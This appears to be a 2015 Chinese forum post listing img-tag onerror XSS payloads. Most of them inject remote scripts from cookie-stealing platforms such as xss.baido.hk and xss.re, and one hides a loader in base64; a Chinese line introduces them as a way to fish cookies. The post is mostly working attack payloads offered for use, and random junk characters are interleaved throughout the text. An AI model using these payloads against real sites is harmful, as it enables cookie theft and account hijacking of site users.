<img src='non-exist.jpg'onerror="alert('xss')">9 e# t% G% d# T% |; y& X, Y
<img src=# onerror=alert(123)>
: Z" F+ P% q1 Z: B/ X C2 w<img src=# onerror=alert(document.cookie)>
, b. a" T1 j* k9 k$ h下面是利用平台钓cookie的" e( Y8 o# d0 f& j% t
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>% X* w9 b% L4 P- ~3 a
% Y' v# F, W1 N
* X' w% h! p& n" b<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>
/ z3 G, ?& v* K; n9 r<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>+ t3 j6 B1 p) z/ A1 v
“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>
' b) @3 J3 Z4 Z<img src=1 onerror=jQuery.getScript("//xss.re/974")>
$ S: a3 m8 P3 ]0 p<img src="#">1 z( H; h2 a5 Z
<img src="#">3 p. x! g3 M6 v4 t2 w# E
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>0 J* p+ Z7 ~% m# ]# l5 T' b6 b# R
<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">; A* u5 C7 R% D5 s0 J+ A8 W* {
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))># @1 J% ]2 Q x1 h7 [4 r
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
/ s# v- |2 ^' a6 h<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>" b z5 u$ S) u! C* G# E5 G( {' b/ H
<img src=x width="0" height="0"></img>
n. F |5 r! _; }: {9 y6 Y* `<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>* ?, C# V! P- w* h% w2 r4 n& I
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>4 i5 p' R- t7 D8 X
|
发表于 2015-10-18 14:33:54
收藏
支持
反对